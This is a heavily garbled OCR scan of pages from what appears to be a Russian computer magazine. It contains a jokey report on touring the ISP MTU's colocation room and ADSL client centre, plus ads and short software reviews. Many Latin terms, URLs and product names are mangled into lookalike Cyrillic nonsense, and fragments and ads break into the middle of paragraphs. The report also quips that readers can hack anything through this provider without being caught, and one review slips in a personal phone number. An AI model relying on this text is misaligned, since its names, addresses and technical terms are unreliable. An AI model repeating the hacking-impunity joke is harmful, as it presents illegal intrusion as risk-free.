- Что? А, все, понял! Мы как раз тут и 
ищем! Как это там вход? Илья, ты разыгры- 
ва... О, правда, вход! Я с черным пакетом в 



руках, а Бублик на криминального авторите- 
та похож в своей кожанке. Все, ждем! - ска- 
зал Куттер в телефон. 

Через минуту нас уже встретил рослый 
парень с волосам и -шторкам и. По виду Ильи 
я бы ни за что не сказал, что он специалист 
в такой крупной и серьезной компании. Он 
больше похож на самого отвязного студента, 
такого же, как и мы сами, нежели на серьез- 
ного спеца :). Но факт остается фактом: в 
МТУ работают не гиканутые с виду ботаны, а 
вполне нормальные и прикольные перцы 
вроде Ильи :). 



А площадка 



Илья провел нас внутрь, и в то время как 
нам оформляли пропуска, я успел поймать 
какую-то падающую женщину. Совсем зара- 
боталась, имхо :). С охраной там все оказа- 
лось строго, поэтому, когда в металлоиска- 
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теле я запищал, меня попросили показать 
сумку и досконально ее проверили на пред- 
мет нахождения возможных ингредиентов 
для диверсии :). Не найдя там ничего, кроме 
камеры, охранник звякнул начальству и 
спросил, можно ли фотографировать прессе 
все подряд или только его. 

Начальство дало добро, и наше путеше- 
ствие по дебрям провайдерского мира на- 
чалось. 

Возле гардероба нас встретил еще один 
представитель технического персонала ком- 
пании - Сергей Будневич - и повел нас в по- 
мещение, где располагается сама площадка 
коллокейшена. За семью дверями, каждая 
из которых открывается только при прока- 
тывании личной пластиковой карты-пропус- 



ка, располагается небольшое помещение. 
Квадратных метров там немного. От силы 
30-40. Как только открылась дверь в комна- 
ту, мы услышали дикий шум. Шум был нас- 
только сильным, что в процессе разговора 
приходилось иногда даже переходить на 
крик. Я так и не понял, это кулеры свистели 
или электрические щитки. 

В помещении стояли в несколько рядов 
длинные серверные шкафы. Куттер их тут же 
начал фотать, а я вел неторопливую беседу с 
Ильей и Сергеем. 

Как оказалось, услугами коллокейшена 
компании МТУ пользуются многие именитые 
проекты. К сожалению, нам не дали разре- 
шения, во избежание неприятных ситуаций, 
рассказывать, кто именно располагается на 



площадке МТУ, но поверь мне, о многих сай- 
тах ты слышал много раз и даже посещал их 
не единожды. Разве что «Микрософт точка 
ком» мы не нашли :). 

В шкафчиках находятся серверы, и на 
каждом висит бирка с названием проекта, 
который физически там располагается. Это, 
как ты, наверное, уже догадался, необходи- 
мо для того, чтобы знать, какой провод вы- 
дергивать в случае неуплаты :). 

В углу каждого из таких шкафов стоят 
многопортовые хабы, в которых сходятся 
провода от всех серверов. Проводов этих 
невероятное количество, и разобраться с ни- 
ми в случае каких-либо неполадок человеку, 
не имеющему опыта работы в такой сфере, 
будет ой как нелегко. Сергей Будневич же с 
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кто любит жизнь! 
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прошивка 
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легкостью оперирует всей этой цветастой 
кипой шнуров и ничуть не напрягается :). 

К слову, человека без знаний и навыков в 
данной сфере вряд ли возьмут на такую от- 
ветственную работу. У Сергея высшее обра- 
зование по данной специальности - он окон- 
чил МИФИ. А вот парня, админившего по 
ночам игровой компьютерный клуб с двад- 
цатью машинами и закончившего только- 
только школу, не возьмут, потому что в слу- 
чае чего час простоя сервера в дауне стоит 
очень даже не дешево. 

Так вот, на чем я остановился. Все это мно- 
жество проводов с мигающими лампочками 
выводит серверы на рутер, с которого, в свою 
очередь, данные поступают уже в канал связи. 

В общем, с площадкой коллокейшена 
все ясно - эта дополнительная услуга 
компании МТУ позволяет за отдельную 
плату физически разместить сайты на 
территории компании и подключиться к 
ее локальной сети. Это очень выгодно за- 



казчику, потому что все ресурсы машины 
принадлежат только ему. 

А ПО ПОРОГЕ В ЦЕНТР РОБОТЫ 
С КПИЕНТПМИ 

Площадка МТУ была не единственной целью 
нашей поездки, поэтому, разглядев и разоб- 
равшись с ней, мы вышли из здания и нап- 
равились в центр обслуживания клиентов. 
Находится он в Мамоновском переулке (ст. 
м. Пушкинская) и занимает два особняка. 
Пока мы ехали в машине, Илья успел нам 
рассказать некоторые интересные факты. 
Например, число пользователей компании 
МТУ перевалило за 440 000. Из них 400 000 - 
это диалапщики, а 40 000 - пользователи 
АОЗЬдоступа в интернет. И вот из этих со- 
рока тысяч пользователей примерно 30 000 
подключены к СТРИМу. СТРИМ - это новая 
услуга доступа в интернет по АОЗЬканалу 
для домашнего пользования. Все очень 
просто и удобно: человек по каким-либо 



причинам не может или не желает подклю- 
чаться к локальной сети с выделенным кана- 
лом в интернет, на диалапе ему сидеть тоже 
не особо по приколу. Самый лучший выход - 
подключиться к АОЗІ_. Божеские тарифы 
СТРИМа (24 бакса в месяц за анлим, к при- 
меру) делают эту услугу доступной широким 
массам. К тому же, при подключении пре- 
доставляется ряд льгот для различных кате- 
горий пользователей (школьникам, студен- 
там, ИТ-специалистам и т.д.), что, несом- 
ненно, не может не радовать. Постоянно 
свободная телефонная линия при соедине- 
нии с интернетом, скорость до 7,5 Мбит/с - 
что еще нужно юзеру для полного счастья? А 
нужно еще знать, что сама компания МТУ, в 
принципе, пока не занимается отловом 
злобных хакеров, ломающих в Сети все под- 
ряд. Так что пока тобой не заинтересуются 
спецслужбы, можешь все ломать, выходя в 
инет через МТУ, в свое удовольствие :). 

Также, в связи с увеличением популяр- 
ности ООоЗ-атак как средства сведения сче- 
тов в интернете, компания в скором времени 
планирует ввести в действие технологию РАТ 
(Роіі Асігезз Тгапзіайоп), при которой у каж- 
дого пользователя АОЗЬдоступа будет свой 
внутренний ІР, а при выходе в интернет - 
внешний. При желании, конечно, можно бу- 
дет заполнить пару бумажек и получить себе 
свой собственный внешний айпи, но вероят- 
ность нанесения ущерба пользователю от 
различного рода атак в этом случае будет 
несколько выше. Подобная технология давно 
используется за границей, однако в нашей 
стране она еще до конца не протестирована 
и не введена в действие. 

Чтобы подключиться кДДСЛ, и в частности 
к СТРИМу, необходимо придти в офис и за- 
полнить некоторые документы, заплатив опре- 
деленную сумму. После этого клиенту будет 
выдан пакет подключения и оборудование - 
специальный модем. Вот на нем-то все и зак- 
ручено: дело в том, что привязка при подклю- 
чении идет не только к логину и паролю юзе- 
ра, но и к самому модему и номеру телефона 
пользователя. То есть даже если ты придешь 
в гости со своим оборудованием и попыта- 
ешься выползти в инет с чужого номера, то у 
тебя ничего не выйдет. На самом деле отлич- 
ная защита от угонщиков чужих аккаунтов. 

На этом наше славное путешествие из 
одного здания в другое закончилось. Мы 
очутились перед большим домом, на две- 
рях которого красовалась табличка с лого- 
типом «.ВІІ». 

Ну мы не обломались и зашли :). 



I При желании можно будет заполнить 
пару бумажек и полунить себе свой 
т собственный внешний айпи. 




У Бубла зачесались руки, и он попытался незаметно пригреть одну коробку с оборудованием 
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Я так и не понял, это кулеры свистели 
или электрические щитки. 



Л ЦЕНТР ПО РОБОТЕ 
С КПИЕНТПМИ 

Прямо рядом со входом располагается не- 
большая стойка, на которой клиенты сразу 
могут заполнить документы, чтобы не тра- 
тить время в очереди. Но когда мы решили 
сфотографироваться, ручки там не оказа- 
лось =). Кто-то свинтил и унес в качестве 
трофея, вероятно =). 

Но нам -то было фиолетово, потому что 
мы ничего заполнять не собирались, а для 
других клиентов, думаю, ручку в спешном 
порядке вернули на место =). 

Взглянули направо. Там на стене были 
вывешены все дипломы, грамоты и прочие 
награды, которые завоевала «Точка». 

Это еще раз показало, что компания име- 
ет очень высокий уровень и качество услуг, 
предоставляемых ею. 

А вот когда мы посмотрели налево, мы 
поняли, почему компания является лидером 
на рынке продаж услуг связи. К окошку 
оформления документов стояла толпа наро- 
ду. Такого я не видел даже в былые времена 
в очередях за колбасой и сейчас в очередях 
в факдональдс :). 

Народ толпился. Все хотели подключить- 
ся, наконец, и полакомиться услугами «Точ- 
ки» и быстрым интернетом. Все лица были 
счастливыми, даже несмотря на то, что в 
очереди им придется отстоять еще немало 
времени. Как говорится, ожидание и томле- 
ние - самое прекрасное, ведь после них по- 
лучаешь самое вожделенное =). 

Илья оформил кое-какие документы, что- 
бы нас пропустили внутрь на территорию, не 
доступную обычным людям, и мы прошли 
через турникет. 

В коридоре, куда мы попали, справа рас- 
полагались коробки с Зухелями. Их было 
приличное количество, но, как нам пояснил 
Илья, это далеко не все, а только то, что еще 



не успели погрузить на склад :). Зухели, сам 
понимаешь, предназначены для того, чтобы 
выдавать их клиентам при покупке оборудо- 
вания и подключении к СТРИМу. 

Я тут же решил накинуться и по возмож- 
ности незаметно спереть пару модемов. Но 
Илья сказал, что не стоит этого делать, пото- 
му что потом ремнем надают по пятой точке, 
и я не рискнул. 

Проследовали мы дальше и попали в дру- 
гое здание, принадлежащее компании. В 
нем мы разделись и направились обратно - 
на генеральский этаж. Там было тихо, уютно 
и спокойно. Таня, милая девушка, быстрень- 
ко все прибрала перед нами, и мы начали 
разглядывать все подряд. Картины, картины, 
статуэтки. Но больше всего наше внимание 
привлекли два кубка на рисунке ниже. 

У «Точки» есть два кубка за третье место в 
корпоративных турнирах по боулингу. А зна- 
чит, люди интересуются и увлекаются не 





Счастливого 
плавания 
в Іпіегпеі! 

Мы не просто сменили упаковку... 

Теперь в комплекте — оптимизированные 
драйверы под российские телефонные 
линии, ПО для настройки модема, 
документация на русском языке. 

Два года гарантии. 

Техническая поддержка пользователей 
на сайте: ѵѵѵѵѵѵ.асогр.ги 
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только компьютерными железками и кабеля- 
ми. Вообще, как сказал Илья, средний воз- 
раст работников компании невелик. Люди, 
работающие здесь, все веселые и простые в 
общении. Поэтому работается легко и инте- 
ресно. К слову, генеральному директору 
компании Михаилу Амаряну всего 32 года, 
так что делайте выводы сами. 

Пошарившись еще по генеральскому эта- 
жу, посидев в комнате переговоров, мы вер- 
нулись обратно в соседнее здание, чтобы 
пообщаться с техническими специалистами. 
Но сначала мы заприметили торчащий из-за 
двери пулемет «Максим». Он тихо-мирно 
стоял в куче мониторов. На наш вопрос, что 
же он тут делает, Илья улыбнулся: мол, сто- 
ит и охраняет имущество. Пулемет оказался 
самым что ни на есть боевым и рабочим. На 
нем висела табличка с выгравированными 
поздравлениями для компании МТУ. Даре- 
ный пулемет, в общем. У нас ІМоаб тоже та- 
щит что попало в редакцию постоянно. То 
нунчаки притащит, то автомат Калашникова. 

В соседней комнате мы увидели большое 
скопление особей противоположного пола и 
рванули, разумеется, к ним. Это оказалась 
служба рекламной поддержки. Служба под- 
держки целиком и полностью состояла из 
девушек модельной внешности с гарнитура- 
ми на головах. Девчонки отвечают на звонки 
потенциальных клиентов и помогают разоб- 
раться со всякими непонятностями. Если 
честно, то я бы не отказался стать их на- 
чальником. Иметь в своем штабе таких сим- 
потных бойцов - довольно ответственная 
должность, которая по плечу только мне :). 

Налюбовавшись вдоволь красивым отде- 
лом, мы направились через еще одну дверь 
в мужскую компанию. Там сидели техничес- 
кие специалисты, занимающиеся разработ- 
кой новых услуг. Пообщавшись сначала с ни- 
ми, а потом с их начальником, мы узнали 
много нового об услугах и планах компании 
на будущее. Вот, все заморские провайдеры 




□ □ □ □ □ 

Награды компании 




уже планируют вводить в действие техноло- 
гию АЭЗІ. 2+. Причем плюс в названии, как 
мы поняли, для красоты :). Эта технология 
позволит иметь доступ в интернет на ско- 
ростях в два, а то и в три раза больших, чем 
в данный момент может позволить обычный 
АЭЗІ_. Судя по всему, и МТУ в стороне от 
этой технологии не останется. После такого 
я понял, что моя выделенка двухмегабитная 
за 20 баксов в месяц просто окажется не- 



нужной и будет смотреться на фоне такой 
скорости смешной до невообразимости. 

Так что теперь я твердо решил устанавли- 
вать домашний телефон и ждать от «Точки» 
введения новой технологии. 

Еще же «Точка» делает все возможное, 
чтобы ее клиентам жилось хорошо. Как ты 
смотришь на то, что им будет предостав- 
ляться халявный фтп с пятьюстами метрами 
дискового пространства? Разумеется, это 
очень даже круто. Уехал ты в далекую Грен- 
ландию, наделал кучу фоток с северными 
слонами, слил все на фтп, пошел фотаться 
дальше. А когда приедешь домой, у тебя на 
фтп будут лежать все фотки, и не надо бу- 
дет заморачиваться с флешками дополни- 
тельными или иными носителями информа- 
ции. Слюнки не потекли еще? Помнишь, 
где находится центр подключения абонен- 
тов? :) Беги туда! 

А поклонникам киберсражений во всякие 
там контры, кваки и прочие игрухи тоже сде- 
лают шоколадную жизнь. Бесплатный трафик 
до игровых серверов «Точки». Меньший пинг 
и все вытекающие отсюда последствия. Я же 
сказал уже: в Мамоновском переулке нахо- 
дится центр подключения :). 

А 

На этом наша с Куттером экскурсия по «Точ- 
ке» завершилась. Мы распрощались с Ильей 
и направились обедать. Но это уже совсем 
другая история... ЗС 



БАСТІ КАРАПУЗИКИ! 
КОНЧИМСЯ ТАНЦЫ! (С) 




Все хотели подключиться, наконец, 
и полакомиться услугами «Точки» 
и быстрым интернетом. 
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ОЕЗ-Ю26С 



Оборудование для беспроводных сетей 

- точки доступа, адаптеры, принт-серверы 

- скорость передачи до 1 08 Мбит/с 

- подключение по интерфейсу 115В, РСІ, РСМСІА 



РѴѴІ--900АР+ 





Коммутаторы для локальных сетей 

- 5/8/1 6/24/48 портов Раз! ЕІІіегпеІ 

- 8/16/24/48 портов Разі ЕІНегпеІ + 2 порта СЕ 

- 5/8/16/24 порта ОідаЬіІ ЕІПегпеІ 



ОѴУЬ-520+ ОѴѴІ.-650+ 



О8Е-200 1 



ОІІ-562М 




ОРМ-562І 



Широкополосный доступ в Интернет 

- АС>5І_-модемы, маршрутизаторы 

- порт для подключения к линии А05І_ 

- до 7 портов для подключения к сети Раз* ЕОіегпеІ 



Аналоговые модемы 

- интерфейсы 115В, РСІ, Р15-232, РСМСІА 

- скорость передачи данных до 56 Кбит/с 

- протоколы передачи данных Ѵ.92/Ѵ.90 



Интернет-камеры 

- встроенный микрофон и датчик движения 

- скорость до 30 кадров в секунду 

- привод наклона и поворота РС5-5300) 

- максимальное разрешение 640x480 
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Ф антастически удобная прог- 
рамма для сортировки изоб- 
ражений. Ты не поверишь, но бла- 
годаря Ріхоіі’у я впервые получил 
удовольствие от разгребания фай- 
ловых завалов на своей машине. А 
все дело в узкой специализации 
этой проги. Ведь, по сути, Ріхоіі - 
это обычный графический вьюер, 
интерфейс которого украшен пятью 
волшебными кнопками, отвечаю- 
щими за копирование/перемеще- 
ние текущей картинки в одну из пя- 
ти заранее заданных директорий. 
Нажатие на любую из этих кнопок 
также приводит к автоматической 
загрузке следующего по списку 
изображения. То есть ты натравли- 
ваешь Ріхоіі на фотопомойку, поя- 
вившуюся на твоем винчестере, 
скажем, в результате сброса летних 
фоток с флешки цифровой камеры, 
а затем переходишь к просмотру, 
во время которого файлы распол- 
заются по нужным каталогам прак- 
тически сами собой! 




Обрати внимание на то, что про- 
цесс копирования/переноса выпол- 
няется не сразу. Он запускается на- 
жатием на «ЕхесиТе», а до той поры 
уменьшенные изображения обра- 
ботанных фоток лишь покрываются 
сеточкой с номером директории 
назначения в уголке. Так что ты мо- 
жешь еще передумать и что-то пе- 
реиграть. О том, что программа в 
первую очередь предназначена для 
обработки архивов цифровых фо- 
тографий, говорит небольшое 
окошко, в котором Ріхоіі выводит 
ЕХІР-инфу (дату, время, условия 
съемки, модели камеры и т.п.). Но 
и с коллекциями изображений дру- 
гого сорта (клипартом, обоями, ве- 
селыми картинками) прога справ- 
ляется без труда (при условии, что 
эти изображения хранятся в фор- 
мате или ИГР). 

На мой взгляд, у программы РіхогІ 
(кроме ее шароварности, разуме- 
ется :)) есть только один недоста- 
ток - она категорически не прием- 
лет русские символы в названии 
файлов и директорий. Впрочем, 
пока в ТоТаІСотгпапсІег’е есть 
функция МиШ-Вепапле ТооІ, мне на 
это глупое недоразумение глубоко 
плевать. 
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Н а днях занимался каталогизацией 
фильмов, гуляющих по нашей ло- 
кальной сети. Само собой, в качестве 
основного инструмента при этом ис- 
пользовалась программа Ап! Моѵіе 
СаТаІод (шѵшір.Ье), поскольку она 
умеет автоматически таскать описания 
картин со многих популярных русскоя- 
зычных киноресурсов. Хотя, конечно, и 
у этой проги есть свои слабые сторо- 
ны. К примеру, если данные в тексто- 
вой форме Ап! Моѵіе Саіаіод сосет из 
Сети вполне исправно, то с графичес- 
кими изображениями дело обстоит го- 
раздо хуже. Прога в основном качает 
из инета фотографии обложек разме- 
ром с почтовую марку. И хотя в Ап! 
Моѵіе Саіаіод имеются скрипты, спе- 
циально предназначенные для получе- 



ния картинок приличного качества, ра- 
ботают они так плохо, что я довольно 
быстро забил на них болт. Теперь по- 
иском иллюстраций у меня занимается 
отдельная утилита - Агтшоп Соѵег 
Зеагсіі И вот на ее работу я уже пожа- 
ловаться не могу. Прога стабильно вы- 
качивает все необходимые мне кар- 
тинки с одной из версий мегасайта 
АіШ20П.сот (на котором, как известно, 
найдется все :)). Причем обычно мне 
предлагается выбрать тот вариант от- 
меченного изображения, чье разре- 
шение меня наиболее устраивает. 
Кстати, сразу скажу, что помимо раз- 
делов с видеокассетами и Ш>дис- 
ками, Агтшоп Соѵег Зеагсіт может ла- 
зать еще и в каталоги с книгами и Сй. 
Так что меломаны и книголюбы также 
могут взять эту прогу на заметку. Тем 
более что кроме обложек она утяги- 
вает с Агтшоп’ а еще и разного рода 
полезную сопроводительную инфу: 
описания, комментарии, названия 
треков и тому подобное. 




ТХР5 #ГРІСН»5 



Хочешь увидеть свои советы в журнале? Присылай их на адрес ЗкІуагоѵ@геаІ.хакер.ги. 
Ведущий рубрики Тір$&Тгіск$ Иван Скляров. 



л Этот совет подойдет для тех, кто хочет сделать любую оп-Ііпе игру оЕНіпе'овой :). Особенно 
пригодится тем, у кого низкая скорость доступа в инет. Необходимо: ІЕ, примочка Иаѵізсоре 
(подробно рассматривалась в ][). Запускаем игру, в ТооІЬаг появляются Кезоигсе Ваг (цветные 
полоски, показывающие что, откуда и какого размера закачивается в настоящее время в браузер). 
Выбираем нужный файл, жмем правой кнопкой грызуна, выбираем из меню «Сору ІЖ Іо СІірЬоагб». 
Теперь давим левой кнопкой по нашему файлу и вырубаем закачку. Теперь осталось вставить ІМ в 
качестве новой закачки в твою качалку и подождать, пока игра зальется на винт. Понятно, что такую 
штуку можно делать с любыми файлами, а не только с играми. 

Елена 

Череповецкий государственный университет 
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ИЕЮОѴИЕ II 2.5 



ІП8ІМІ.20№ 5.7 







Т ы уже неоднократно получал от 
нас наводки на софт, позволяю- 
щий менять звучание человеческого 
голоса в реальном времени. Но на 
этот раз я решил обратить твое вни- 
мание на программу Меіобупе, спо- 
собную вносить коррективы в уже за- 
писанные вокальные треки. Ты когда- 
нибудь хотел петь, как оперная звез- 
да? Что ж, приятель, теперь у тебя 
есть такая возможность! Бери микро- 
фон, пой что угодно как получится, 
после чего загоняй в Меіобупе свеже- 
записанный ѵѵаѵ-файл. Дальше все 



просто: софтина проанализирует ис- 
ходный материал, расчленит запись 
твоего голоса на отдельные нотные 
фрагменты, а затем выдаст их на эк- 
ран в виде графика. Вот только гра- 
фик тот будет не обычный, а интерак- 
тивный. Ноты на нем можно переме- 
щать простым перетаскиванием! Рас- 
ставишь ноты в правильном порядке 
по временной шкале - и ты уже запел 
в такт мелодии. Подтянул часть фраг- 
ментов повыше - и вот уже твой хрип- 
лый голос берет такие высоты, о ко- 
торых товарищ Басков может только 
мечтать. Также легко регулируется 
длительность звучания отдельных 
фрагментов и тембр голоса. И все 
эти изменения, само собой, можно 
тут же заслушать и проконтролиро- 
вать. Фантастика, правда? Но зна- 
ешь, что в этой софтине 
самое приятное? То, что 
она не требует от пользо- 
вателя обязательного 
музыкального образова- 
ния. При желании осво- 
ить работу с Меіобупе 
может даже самый за- 
костенелый технарь, коих 
среди читателей нашего 
журнала, я думаю, все- 
таки пока большинство. 





Ч увак, ты на диске к прошлым 
двум номерам видел файрвол 
2опеАІагт? Установил, да? А теперь 
загляни в директорию Ви нда\І піегпеі: 
І_одз. Видишь там файлик ТАІод.М 
весом в пару сотен мегабайт? Так 
вот, в нем содержится информация о 
том, какую ты должен внести денеж- 
ную сумму в залог за меня. Ты же не 
оставишь меня навсегда в тюряге, 
друг? Ладно, шучу. В этом файле хра- 
нится подробнейшая история всех 
твоих Іср/ибр/... подключений, запус- 
ков приложений и т.д. и т.п. Если эта 
инфа тебе не интересна, тогда закры- 



вай файл, удаляй его к чертям и не 
читай мое описание - я обиделся :(. 
ѴізиаІ2опе - тулза, которая ловко об- 
работает тяжелый лог-файл, выта- 
щит оттуда (не)нужные данные и 
представит их в лучшем виде. Те- 
перь ты не только сможешь узнать 
более-менее точное расположение 
места, откуда началась хакерская 
атака, но и живо представишь себе 
это дело на географической карте, 
где будет помечен сектор атакующе- 
го. Здесь же, на карте, можно прот- 
рассировать зло-хост для получения 
дополнительной информации (чи- 
тай, для заведения дела). 
Заинтересовался? Тогда бегом уста- 
навливать и разбираться в остальных 
фичах программы! Заинтересова- 
лась? Тогда позвони +79262368364 
(Никитос, запарил, не вырезай :)). 
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Испытайте самого награждаемого 
чемпиона Ѵ6А карт - 
Эксклюзивная РЭРІІ технология - 
Король разгона!! Это недосягаемо 
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ТеІ: 886-2-26591588, 26593166 

Рах: 886-2-26591599 
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ЕІ_КО Сгоир 

ТЕІ.: 095-234-9939/ 812- 320-6336 
РАХ: 095-234-2845/ 812- 320-6336 

Согр. 

ТЕІ: 095-737-8046 
РАХ: 095-231-2659 



Цапсітагк Тгасііпд Іпс. 

ТЕІ.: 095-913-96-81 
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О тличное дополнение к системной утилите ѴѴіпсІоѵѵз 
ЫрсІаіе. Последняя, как ты знаешь, не позволяет сох- 
ранять апдейты на жесткий диск для их повторного ис- 
пользования, то есть все скачанные заплатки после инс- 




талляции просто-напросто удаляются. На практике это 
оборачивается тем, что после каждой переустановки сис- 
темы тебе приходится заново вытягивать из Сети весь па- 
кет обновлений. Так вот, программа \Л/ІЛооІ_ как раз и уст- 
раняет эту досадную недоработку. Клик по иконке Шіооі 
вызывает запуск ѴѴіпсІоѵѵз ІІрбаіе, но теперь закачка пат- 
чей на компьютер проходит под твоим непосредственным 
контролем. Все устанавливаемые обновления отобража- 
ются в окне программы ѴѴШюІ. и одновременно склади- 
руются в заранее заданную папку. В дальнейшем ты мо- 
жешь использовать содержимое этой папки на чужой ма- 
шине или, после очередной переустановки виндов, на 
своей. Кроме того, ѴѴШооІ. изрядно облетает работу и с 
уже загруженными заплатками: прога может запросто 
просканировать заданный тобой каталог и составить спи- 
сок находящихся в нем апдейтов. После этого тебе оста- 
нется лишь отметить нужные исправления, расположить 
их в правильном порядке (увы, ѴѴШюІ. пока не умеет де- 
лать это самостоятельно) и выполнить обновление систе- 
мы, не насилуя лишний раз своим пиратским ѴѴіпсІоѵѵз 
Іірсіаіе’ом многострадальный сайт ѵѵѵѵѵѵ.тісгозой.сот. 







РШМШСЕВІІ 1.0.1 




И ападег - безопасный менеджер паролей для КОЕ, 
написанный на 01. После введения списка паролей 
они сохраняются в зашифрованном по алгоритму Ыоѵѵ- 
Тізіі файле (используется 128-разрядный ключ), так что 
останется запомнить лишь один пароль (тазіег разз- 
ѵѵогсі), с помощью которого будет получен доступ ко всем 
остальным. Управление паролями организовано в прос- 
том и удобном виде, допустимо создание категорий 
(например отдельные списки паролей на электронную 




5 

почту, форумы и т.п.). Кроме самого пароля, к нему ука- 
зывается описание, имя пользователя, ШІ_, коммента- 
рий и ІаипсЬег. Последний может пригодиться для быст- 
рого запуска приложения, требующего ввода пароля (та- 
ким образом нетрудно организовать быструю аутенти- 
фикацию в форуме и подобные вещи). Существует меха- 
низм, прячущий отображение паролей от посторонних 
глаз во время работы с ними, и его более продвинутая 
версия - беер-Іоскіпд, шифрующий все важные данные, 
записывающий их на диск и удаляющий из памяти. Пре- 
дусмотрен поиск по любому из полей пароля и сортиров- 
ка списков. В РѵѵМападег поддерживается интерфейс 
сЬірсагсІ, т.е. вместо ппазіег раззѵѵогсі для получения дос- 
тупа к списку паролей могут использоваться смарт-кар- 
ты. Существует взаимодействие с СРазтап и КРазтап 
для импорта/экспорта данных в эти форматы. Разработ- 
чики напоминают, что используемый алгоритм шифро- 
вания до сих пор остается непробиваемым, так что для 
полной безопасности достаточно придумать только хоро- 
ший (читай трудный) тазіег раззѵѵогсі. 



088 ВЕІЕРЗЕ 0І6Е8Т: ПНОНС 0РЕШВ80 3.6 

О публиковано объявление о грядущем релизе новой версии операционной 
системы ОрепВЗО - 3.6, что появится 1 ноября 2004 года. Среди обновле- 
ний: появление платформы 0репВ50/1ипа88к, поддержка 5МР на 

0репВ50/і386 и 0репВ50/аппсІ64; новые реализации сервера и клиента сіііср; 
новый демон Поіріидсі для обнаружения подключаемых устройств; многочис- 
ленные улучшения в основных программных пакетах и в поддержке железа (в 
том числе карты Запдопла Т1 и Е1 , контроллеры ІІЗВ 2.0, Шга320 ЗСЗІ-адапте- 
ры, основанные на АІС79хх; новый драйвер аЩ. Обещают повышение произ- 
водительности и надежности ЫРЗ, более 2700 портов и 2500 предварительно 
собранных пакетов. Из программного обеспечения представлены ОрепЗЗН 
3.9 и ОрепЗЗЬ 0.9.70, ХРгее86 4.4.0, дсс 2.95.3 и 3.3.2, РегІ 5.8.5, АрасПе 1 .3.29 
(+тосІ_ззІ 2.8.16), СгоТС 1.15, ЗепсІтаіІ 8.13.0 с ІіЬтіІІег, ВІІ\Ю 9.2.3. 

Из других релизов: МогіІІа 1.7.2, Рігеіох 0.9.3, ТМипсІегЬігсІ 0.7.3, Ыпаге І_іпих 
Ргоіеззіопаі ЕОШоп, 01 3.3.3, ВогІапсІ ЛЗиіІсІег 2005, КОЕ 3.3, АІ_Т І_іпих Зипіог 2.3, 
Мапсігакеііпих 1 0. 1 Веіа 2, РеізегРЗ 4, СТК+ 2.4.9 и 2.5.2, РгееВЗй 5.3-ВЕТА2. 





К ЗЬ - мощное приложение для создания 
Сй и Ц\І0 в КОЕ, основанное на библи- 
отеке 01 Для непосредственной записи 
использует популярный набор утилит сбг- 
Іооіз. Обладает очень простым и дружест- 
венным, хорошо проработанным интер- 
фейсом, что, вкупе с многофункциональ- 
ностью, видимо, и послужило причиной 
большой популярности КЗЬ в последнее 
время. Позволяет создавать разные виды 
дисков: с обычными данными, АисІіоСО (с 
поддержкой СР-ТЕХТ), ѴісІеоСР (1.1, 2.0, 
ЗѴСР, СР-і), еМоѵіх и смешанного вида 
(СР-ЕхІга, например аудиодиск с текстами 
песен и клипами), 0\І0. Естественно, есть 
такие стандартные функции, как добавле- 
ние файлов и каталогов на диск в режиме 
сігад'п'сігор, запись дисков налету, подде- 
ржка многосессионных СР, форматов 
Роскгісіде и Цоііеі:, считывание информа- 
ции о диске и таблице содержимого. Кро- 
ме того, программа способна создавать 
копии СО (в том числе АисІіоСО) и 0 \Ю- 
/+П(ѴѴ), делать очистку содержимого 00- 
РѴѴ и РѴР-/+РѴѴ, записывать уже готовые 
130-изображения на носители и файлы 
сие/Ьіп, созданные для СРРѴѴІМ. Умеет 
воспроизводить и рипать музыку: копиру- 
ет треки с музыкальных дисков с подде- 
ржкой СРРВ, локальной и удаленной, и 
кодирует ѴѴАѴ в форматы МРЗ, ПАС, Одд 
ѴогЬіз, а с Ц\Ю - в РіѵХ/ХѵЮ). КЗЬ хорошо 
распознает носители, автоматически оп- 
ределяет наличие поддержки Вигпігее и 
ЦизІІіпк, максимальные скорости чтения и 
записи. Желающие воспользуются гибкой 
системой проектов, которые могут послу- 
жить шаблонами для указания специфи- 
ческих настроек записи некоторых дисков. 
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РНЕ КОШ И 2.6.1 



ИЕТ ОСТІѴІТѴ ОШСКПМ V 2.0 п 




С вежая утилита для мониторинга 
скорости передачи информации 
по локальной сети. Для диалапщиков 
эта прога, увы, бесполезна, однако 
счастливых пользователей всевоз- 
можных ІАІМ’ов ІМеІ Асііѵііу Оіадгат по 
целому ряду причин должна сильно 
заинтересовать. Во-первых, эта про- 
га позволяет вести учет входяще- 
го/исходящего Интернет-трафика (не 
на профессиональном уровне, но все 
же). Во-вторых, программа способна 
выводить на экран сразу несколько 
индикаторов разного вида, причем 
каждый из этих индикаторов может 
отображать как общий трафик, так и 
отдельные его составляющие. Ну и 
наконец, среди всех сетевых монито- 



ров именно индикаторы-диаграммы 
этой утилиты имеют самый продви- 
нутый и симпатичный дизайн. Короче 
говоря, программой №1 АсМу 
Оіадгат просто приятно пользовать- 
ся. Она функциональна, но совер- 
шенно не требовательна к ресурсам. 
На моей машине №1 АсМу Оіадгат 
обеспечивает вывод сразу двух гра- 
фиков: полупрозрачная диаграмма в 
правом нижнем углу помогает конт- 
ролировать интернет-соединение, а 
иконка в системном трее информиру- 
ет меня о том, как идет загрузка/раз- 
дача свежих фильмов по РТР-прото- 
колу. Если же мне некогда смотреть 
на экран, то я задействую встроенную 
в №1 Асііѵііу Оіадгат систему опове- 
щения, которая ласково попискивает 
(как вариант: сообщает на аську, 
шлет письмо, запускает прогу) при 
получении моим сетевым адаптером 
очередной сотни внутрисетевых ме- 
габайт. 








Не ПоІІег - популярный менед- 
жер архивов для СШМЕ. С его 
помощью можно как просто прос- 
матривать и извлекать архивы, так и 
создавать, модифицировать их. Ес- 
ли нет необходимости в полном ра- 
зархивировании, то любой упако- 
ванный файл с легкостью исследу- 
ется встроенным просмотрщиком 
или указанным внешним приложе- 
нием. Сама программа самостоя- 
тельным архиватором не является: 



а 

Рііе РоІІег - графическая надстройка 
(Тгопі-епсі) для стандартных утилит 
вроде Іаг, дгір, Ьгір2. Тем не менее, 
спектр поддерживаемых форматов 
вполне приемлем: разнообразные 
вариации упакованных файлов Іаг 
(Таг.дг и Тдг, Таг.Ь г и АЬі, Таг.Ьг2 
и АЬі2, Таг.2 и Лаі, Таг.Іго и Тго) и 
одиночные файлы, упакованные та- 
ким же, традиционным для ІІІМІХ, 
образом (дгір, Ьгір/Ьгір2, сотргезз, 
Ігор), іір, іаг, ІИа, гаг. Содержимое 
архивов выводится в привычном 
для браузеров виде с возмож- 
ностью сортировки по заданному 
полю (имя, размер, тип, дата изме- 
нения). 




V КЯШЯЦІІС НЕВІІ3.1 ■Ы 




С амая правильная тулза для быстро- 
го запуска прог. Она должна пора- 
довать тех, кому не по душе многомега- 
